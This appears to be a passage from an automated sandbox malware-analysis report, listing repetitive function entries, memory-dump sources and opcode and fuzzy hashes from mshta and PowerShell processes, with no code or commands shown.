                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278513361.00000250DC912000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC911000, based on PE: false
                                                                                                                                                          • Associated: 00000003.00000003.58278417488.00000250DC911000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc911000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 62f7e407c5c4fd50b40e8daa1cdf719444ebaf01cd8353a3d2d8824ee59912b5
                                                                                                                                                          • Instruction ID: e07b623653329d3877965824f6b56b3a39afc9a781e3b8aec041f86d526bb52d
                                                                                                                                                          • Opcode Fuzzy Hash: 62f7e407c5c4fd50b40e8daa1cdf719444ebaf01cd8353a3d2d8824ee59912b5
                                                                                                                                                          • Instruction Fuzzy Hash: 5802D17110EFC51FE756DBA84C9E6A1BFE0EB5A311F0C45DED089CB1E6C5249886C349
                                                                                                                                                          Function 00000250DC912F14 Relevance: .5, Instructions: 532COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278513361.00000250DC912000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC912000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc911000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 62f7e407c5c4fd50b40e8daa1cdf719444ebaf01cd8353a3d2d8824ee59912b5
                                                                                                                                                          • Instruction ID: e07b623653329d3877965824f6b56b3a39afc9a781e3b8aec041f86d526bb52d
                                                                                                                                                          • Opcode Fuzzy Hash: 62f7e407c5c4fd50b40e8daa1cdf719444ebaf01cd8353a3d2d8824ee59912b5
                                                                                                                                                          • Instruction Fuzzy Hash: 5802D17110EFC51FE756DBA84C9E6A1BFE0EB5A311F0C45DED089CB1E6C5249886C349
                                                                                                                                                          Function 00000250DC9103C5 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278556407.00000250DC910000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC910000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc910000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: beb09eb8bf04d31fe1905f2e47375c9eb19f91853170be8f4a463dbfb119630e
                                                                                                                                                          • Instruction ID: fca6c7cabf868c2d84719d96eb91c2b5cf586b31554a8d300d9b739d803be088
                                                                                                                                                          • Opcode Fuzzy Hash: beb09eb8bf04d31fe1905f2e47375c9eb19f91853170be8f4a463dbfb119630e
                                                                                                                                                          • Instruction Fuzzy Hash: 0841033150EF881FE7519BECAC8A3D87FE0EB4A320F0801DBD448CB192D5299882C796
                                                                                                                                                          Function 00000250DC913CCE Relevance: .0, Instructions: 25COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278513361.00000250DC912000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC911000, based on PE: false
                                                                                                                                                          • Associated: 00000003.00000003.58278417488.00000250DC911000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc911000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7b82260e8c05f35ce7ba3a49190d040939a4df4e32004465e565059a6c021aba
                                                                                                                                                          • Instruction ID: b9636953fd702dd91f3b19797c641d15e068b81296e972749ec6e9a5c1b062ce
                                                                                                                                                          • Opcode Fuzzy Hash: 7b82260e8c05f35ce7ba3a49190d040939a4df4e32004465e565059a6c021aba
                                                                                                                                                          • Instruction Fuzzy Hash: 0FE0EDD015EBC52FD38783A80C6DA606FE89B57540B5D44CAA585CB1B3C81D8A569316
                                                                                                                                                          Function 00000250DC913CCE Relevance: .0, Instructions: 25COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278513361.00000250DC912000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC912000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc911000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7b82260e8c05f35ce7ba3a49190d040939a4df4e32004465e565059a6c021aba
                                                                                                                                                          • Instruction ID: b9636953fd702dd91f3b19797c641d15e068b81296e972749ec6e9a5c1b062ce
                                                                                                                                                          • Opcode Fuzzy Hash: 7b82260e8c05f35ce7ba3a49190d040939a4df4e32004465e565059a6c021aba
                                                                                                                                                          • Instruction Fuzzy Hash: 0FE0EDD015EBC52FD38783A80C6DA606FE89B57540B5D44CAA585CB1B3C81D8A569316
                                                                                                                                                          Function 00000250DC911B7A Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278417488.00000250DC911000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC911000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc911000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 988b646930e1788a5bba88ef703f341702c822c2320f592a9bb4d99de89b7c6d
                                                                                                                                                          • Instruction ID: f9df09bf5845c34ec3388597122d0595cb45b460287dd122db9136833e832e20
                                                                                                                                                          • Opcode Fuzzy Hash: 988b646930e1788a5bba88ef703f341702c822c2320f592a9bb4d99de89b7c6d
                                                                                                                                                          • Instruction Fuzzy Hash: 08900265819F1667E52021F45C4E12861919B58692B1909618822D3150D82459401495
                                                                                                                                                          Function 00000250DC800EE1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800EE9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800EF9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F09 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F29 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F49 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F61 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F69 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F81 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156
                                                                                                                                                          Function 00000250DC800FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000003.58278589099.00000250DC800000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000250DC800000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_3_250dc800000_mshta.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction ID: d0288c5744770db1ee0cd5d2263a91981431039122129c0de0b58bbd412f3476
                                                                                                                                                          • Opcode Fuzzy Hash: 78442604318d0cd3b8de6e4fa4cdd47b0d2400c1432924e9514fb28b61ed518c
                                                                                                                                                          • Instruction Fuzzy Hash: 7A90021449684A55D41411D10D8965C5151B388251FD44481441690184D95D029A3156

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00007FFB4C931C92 Relevance: .4, Instructions: 403COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000004.00000002.58407581901.00007FFB4C930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C930000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4c930000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 220aeb603b61ab47cd5ecd67a9deb748404346f403c0dba4f68ebf230de81660
                                                                                                                                                          • Instruction ID: c418f653b5a7894fcc8ee9f31a4b582838f16293faf0d188a14654fc4a62586c
                                                                                                                                                          • Opcode Fuzzy Hash: 220aeb603b61ab47cd5ecd67a9deb748404346f403c0dba4f68ebf230de81660
                                                                                                                                                          • Instruction Fuzzy Hash: 14C1F6A1A0DB891FD797AA78C8592B57FE1DF9A610B0901FBD088CB1F3DA189C05C351
                                                                                                                                                          Function 00007FFB4C930C3E Relevance: .2, Instructions: 192COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000004.00000002.58407581901.00007FFB4C930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C930000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4c930000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6dd246bfb580ce61c23a56d39f7b590ddb5c50b9af241a457eefe01c198ed744
                                                                                                                                                          • Instruction ID: 1b0c0e8e838b781cb9ba8b50d237299908f6e7a38115f96422bada9a59754cca
                                                                                                                                                          • Opcode Fuzzy Hash: 6dd246bfb580ce61c23a56d39f7b590ddb5c50b9af241a457eefe01c198ed744
                                                                                                                                                          • Instruction Fuzzy Hash: 50511AE2F1DB4A2FE7ABAA3CC5592B966C1EFD8610B4410BFD45DC71E2DE14AC048381
                                                                                                                                                          Function 00007FFB4C930C8A Relevance: .1, Instructions: 112COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000004.00000002.58407581901.00007FFB4C930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C930000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4c930000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8bb872707bd57d55c608fd385e2584145c063acb981d197b018548cade39dd79
                                                                                                                                                          • Instruction ID: 86a261ff00908212b5371eed1c1ba3af396f5192e40879217aa36acad1d004f2
                                                                                                                                                          • Opcode Fuzzy Hash: 8bb872707bd57d55c608fd385e2584145c063acb981d197b018548cade39dd79
                                                                                                                                                          • Instruction Fuzzy Hash: 1631D8D2E1EB4A2BF7ABBA3CC65A17865C1EFD8650B4410BBD45DC71E2DF18AC044241
                                                                                                                                                          Function 00007FFB4C864CDA Relevance: .1, Instructions: 82COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000004.00000002.58403616749.00007FFB4C860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4c860000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 84aaad4d36f07133c6d2fdbe5625e19d0d45b2247ce72e502f291e297cbb4dde
                                                                                                                                                          • Instruction ID: 9dc3e8cf7335c4d3d5c8179d38a7dbe87b6321a25ba3f45ba27799f969465625
                                                                                                                                                          • Opcode Fuzzy Hash: 84aaad4d36f07133c6d2fdbe5625e19d0d45b2247ce72e502f291e297cbb4dde
                                                                                                                                                          • Instruction Fuzzy Hash: 8F2145F2F0D6574BE324BE3CDA890F87782DFD1A217148233D468CB296DC28A8058384
                                                                                                                                                          Function 00007FFB4C931E5A Relevance: .1, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
